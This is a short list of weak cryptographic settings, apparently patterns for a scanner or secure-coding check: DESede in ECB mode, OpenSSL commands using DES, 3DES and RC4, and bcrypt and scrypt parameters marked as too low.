DESede/ECB/PKCS5Padding
# OpenSSL weak ciphers
openssl enc -des
openssl enc -des3
openssl enc -rc4
# Bcrypt with low cost
bcrypt cost < 10
bcrypt rounds = 1
# Scrypt with weak parameters
N=2^10 (too low)
r=1 (too low)
p=1 (too low)